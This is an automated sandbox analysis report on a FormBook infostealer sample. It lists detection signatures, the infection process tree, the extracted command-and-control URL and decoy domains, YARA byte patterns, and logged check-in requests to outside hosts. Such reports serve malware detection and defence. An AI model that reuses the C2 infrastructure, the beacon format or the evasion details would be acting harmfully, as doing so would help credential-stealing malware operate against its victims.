Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report SX365783909782021.bat

Overview

General Information

Sample Name:SX365783909782021.bat (renamed file extension from bat to exe)
Analysis ID:433214
MD5:ee1f4a07b874aa6ba18d6aa0f83252d3
SHA1:d17b97dc47707b685bc8976d3cbc6cdbfbd5fcee
SHA256:d66268222a39fd97e792983a3bacdb1e81067b7a28848a87fe65a5dc91f7e82a
Tags:exe
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • SX365783909782021.exe (PID: 4092 cmdline: 'C:\Users\user\Desktop\SX365783909782021.exe' MD5: EE1F4A07B874AA6BA18D6AA0F83252D3)
    • SX365783909782021.exe (PID: 5472 cmdline: 'C:\Users\user\Desktop\SX365783909782021.exe' MD5: EE1F4A07B874AA6BA18D6AA0F83252D3)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • help.exe (PID: 5524 cmdline: C:\Windows\SysWOW64\help.exe MD5: 09A715036F14D3632AD03B52D1DA6BFF)
          • cmd.exe (PID: 6124 cmdline: /c del 'C:\Users\user\Desktop\SX365783909782021.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 4720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.moneyhuntercom.info/ngvm/"], "decoy": ["justiceforashleymoore.com", "tyqbfe.com", "zydonghua.com", "crossfootwear.com", "mysticlight-shop.com", "digitaldefenseacademy.com", "joyfulgoodies.com", "blog-kotori-haru.com", "atelierlinneakunstoghelse.com", "destinyonlineacademy.com", "series.onl", "bellizzo.com", "totalscalpsolutions.com", "musicrowstudiorecording.com", "digitalgamerentals.com", "princecreativehk.com", "bitchesofzion.com", "imodalmarine.com", "chilly-sauce.com", "studionikolla.com", "jilluonlinemart.com", "ypoinc.com", "chothuenhaxuongtphcm.com", "gadamagado.com", "cartscroll.com", "congying1688.com", "fesdimac.com", "xn--rhqu70hdoa298e.com", "zkdxin168.com", "the-plague-doctor.com", "speakeroo.online", "urban-xr.com", "kanjani8-house.com", "alberaber.com", "eamm-eg.com", "alsawtisrael.com", "deathvalleysolar.com", "vuyo.club", "zcoatux.icu", "marksfly.com", "advertisershopper.com", "hashratelab.com", "broadesys.com", "sampoelstra.com", "poacolors.com", "sciencelogicandfaith.com", "bootupcertificatemount.xyz", "alotranscend.com", "steadwaybytriarc.com", "simplefinest.com", "adinaroseyoga.com", "btb659.com", "ecftech.com", "caravansforsalenorthwales.com", "e1536.com", "sellmyhouseolympia.com", "vacalinda.com", "truegemsproperty.com", "aeternusprofero.com", "djspencer.com", "zhubviz.online", "xn--r2bnc0b.com", "luisxe.info", "servicesbackyard.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.258574044.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000002.00000002.258574044.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000002.00000002.258574044.0000000000400000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18419:$sqlite3step: 68 34 1C 7B E1
    • 0x1852c:$sqlite3step: 68 34 1C 7B E1
    • 0x18448:$sqlite3text: 68 38 2A 90 C5
    • 0x1856d:$sqlite3text: 68 38 2A 90 C5
    • 0x1845b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18583:$sqlite3blob: 68 53 D8 7F 8C
    00000005.00000002.473754310.0000000003200000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000005.00000002.473754310.0000000003200000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 16 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      2.2.SX365783909782021.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        2.2.SX365783909782021.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1a6f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1b6fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        2.2.SX365783909782021.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x17619:$sqlite3step: 68 34 1C 7B E1
        • 0x1772c:$sqlite3step: 68 34 1C 7B E1
        • 0x17648:$sqlite3text: 68 38 2A 90 C5
        • 0x1776d:$sqlite3text: 68 38 2A 90 C5
        • 0x1765b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17783:$sqlite3blob: 68 53 D8 7F 8C
        2.1.SX365783909782021.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          2.1.SX365783909782021.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000002.00000002.258574044.0000000000400000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.moneyhuntercom.info/ngvm/"], "decoy": ["justiceforashleymoore.com", "tyqbfe.com", "zydonghua.com", "crossfootwear.com", "mysticlight-shop.com", "digitaldefenseacademy.com", "joyfulgoodies.com", "blog-kotori-haru.com", "atelierlinneakunstoghelse.com", "destinyonlineacademy.com", "series.onl", "bellizzo.com", "totalscalpsolutions.com", "musicrowstudiorecording.com", "digitalgamerentals.com", "princecreativehk.com", "bitchesofzion.com", "imodalmarine.com", "chilly-sauce.com", "studionikolla.com", "jilluonlinemart.com", "ypoinc.com", "chothuenhaxuongtphcm.com", "gadamagado.com", "cartscroll.com", "congying1688.com", "fesdimac.com", "xn--rhqu70hdoa298e.com", "zkdxin168.com", "the-plague-doctor.com", "speakeroo.online", "urban-xr.com", "kanjani8-house.com", "alberaber.com", "eamm-eg.com", "alsawtisrael.com", "deathvalleysolar.com", "vuyo.club", "zcoatux.icu", "marksfly.com", "advertisershopper.com", "hashratelab.com", "broadesys.com", "sampoelstra.com", "poacolors.com", "sciencelogicandfaith.com", "bootupcertificatemount.xyz", "alotranscend.com", "steadwaybytriarc.com", "simplefinest.com", "adinaroseyoga.com", "btb659.com", "ecftech.com", "caravansforsalenorthwales.com", "e1536.com", "sellmyhouseolympia.com", "vacalinda.com", "truegemsproperty.com", "aeternusprofero.com", "djspencer.com", "zhubviz.online", "xn--r2bnc0b.com", "luisxe.info", "servicesbackyard.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: SX365783909782021.exeVirustotal: Detection: 31%Perma Link
          Source: SX365783909782021.exeReversingLabs: Detection: 39%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.258574044.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.473754310.0000000003200000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.209804420.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.258786803.00000000005B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.211210535.00000000022B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.258837957.0000000000710000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.472090660.0000000000C30000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.2.SX365783909782021.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.SX365783909782021.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.SX365783909782021.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SX365783909782021.exe.22b0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SX365783909782021.exe.22b0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.SX365783909782021.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: SX365783909782021.exeJoe Sandbox ML: detected
          Source: 2.2.SX365783909782021.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.2.help.exe.3b2f834.5.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 2.1.SX365783909782021.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.2.help.exe.d3d870.2.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 0.2.SX365783909782021.exe.22b0000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: SX365783909782021.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: Binary string: wntdll.pdbUGP source: SX365783909782021.exe, 00000000.00000003.209611066.0000000009B30000.00000004.00000001.sdmp, SX365783909782021.exe, 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, help.exe, 00000005.00000002.474720424.000000000371F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: SX365783909782021.exe, help.exe
          Source: Binary string: help.pdbGCTL source: SX365783909782021.exe, 00000002.00000002.258899247.0000000000769000.00000004.00000020.sdmp
          Source: Binary string: help.pdb source: SX365783909782021.exe, 00000002.00000002.258899247.0000000000769000.00000004.00000020.sdmp
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 0_2_00405E61 FindFirstFileA,FindClose,0_2_00405E61
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 0_2_0040548B CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_0040548B
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 0_2_0040263E FindFirstFileA,0_2_0040263E
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 4x nop then pop edi2_2_00416CB5
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 4x nop then pop edi2_1_00416CB5
          Source: C:\Windows\SysWOW64\help.exeCode function: 4x nop then pop edi5_2_03216CB5

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49740 -> 168.235.88.209:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49740 -> 168.235.88.209:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49740 -> 168.235.88.209:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.moneyhuntercom.info/ngvm/
          Source: global trafficHTTP traffic detected: GET /ngvm/?w6A=st23zvU/E1xU5Qy7Hp2PD30UnMfCa5knANSLf3ItiB6oVvQd6+qg6yvUWRtcyiXbPLds&3fox=SBZ4 HTTP/1.1Host: www.vacalinda.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ngvm/?w6A=UyLqygKx2FmdGYSRh5mqmU7zHOPmyh0H52xSnc3cVgCKFPBqoRmOJ0eYguKTgHZNEA4k&3fox=SBZ4 HTTP/1.1Host: www.servicesbackyard.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ngvm/?w6A=HBVp1ZFUGcT+hxfW3ntFEbmU5GO8vrkA1mLmG5vd048TCTgwy52mAcu3AE2RaU7PuRfb&3fox=SBZ4 HTTP/1.1Host: www.djspencer.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ngvm/?w6A=uz7CW46zGnQqpjgqznnFmpPrWAklZoEybcG+oUJN9dvYL4OpOEr/HbmCuGHk2zZbqVpb&3fox=SBZ4 HTTP/1.1Host: www.caravansforsalenorthwales.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 168.235.88.209 168.235.88.209
          Source: Joe Sandbox ViewASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
          Source: global trafficHTTP traffic detected: GET /ngvm/?w6A=st23zvU/E1xU5Qy7Hp2PD30UnMfCa5knANSLf3ItiB6oVvQd6+qg6yvUWRtcyiXbPLds&3fox=SBZ4 HTTP/1.1Host: www.vacalinda.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ngvm/?w6A=UyLqygKx2FmdGYSRh5mqmU7zHOPmyh0H52xSnc3cVgCKFPBqoRmOJ0eYguKTgHZNEA4k&3fox=SBZ4 HTTP/1.1Host: www.servicesbackyard.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ngvm/?w6A=HBVp1ZFUGcT+hxfW3ntFEbmU5GO8vrkA1mLmG5vd048TCTgwy52mAcu3AE2RaU7PuRfb&3fox=SBZ4 HTTP/1.1Host: www.djspencer.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ngvm/?w6A=uz7CW46zGnQqpjgqznnFmpPrWAklZoEybcG+oUJN9dvYL4OpOEr/HbmCuGHk2zZbqVpb&3fox=SBZ4 HTTP/1.1Host: www.caravansforsalenorthwales.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.vacalinda.com
          Source: explorer.exe, 00000003.00000000.227112576.0000000008A06000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: SX365783909782021.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: SX365783909782021.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 0_2_00405042 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405042

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.258574044.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.473754310.0000000003200000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.209804420.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.258786803.00000000005B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.211210535.00000000022B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.258837957.0000000000710000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.472090660.0000000000C30000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.2.SX365783909782021.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.SX365783909782021.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.SX365783909782021.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SX365783909782021.exe.22b0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SX365783909782021.exe.22b0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.SX365783909782021.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000002.00000002.258574044.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.258574044.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.473754310.0000000003200000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.473754310.0000000003200000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000001.209804420.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000001.209804420.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.258786803.00000000005B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.258786803.00000000005B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.211210535.00000000022B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.211210535.00000000022B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.258837957.0000000000710000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.258837957.0000000000710000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.472090660.0000000000C30000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.472090660.0000000000C30000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.SX365783909782021.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.SX365783909782021.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.1.SX365783909782021.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.1.SX365783909782021.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.1.SX365783909782021.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.1.SX365783909782021.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.SX365783909782021.exe.22b0000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.SX365783909782021.exe.22b0000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.SX365783909782021.exe.22b0000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.SX365783909782021.exe.22b0000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.SX365783909782021.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.SX365783909782021.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_0041A060 NtClose,2_2_0041A060
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_0041A110 NtAllocateVirtualMemory,2_2_0041A110
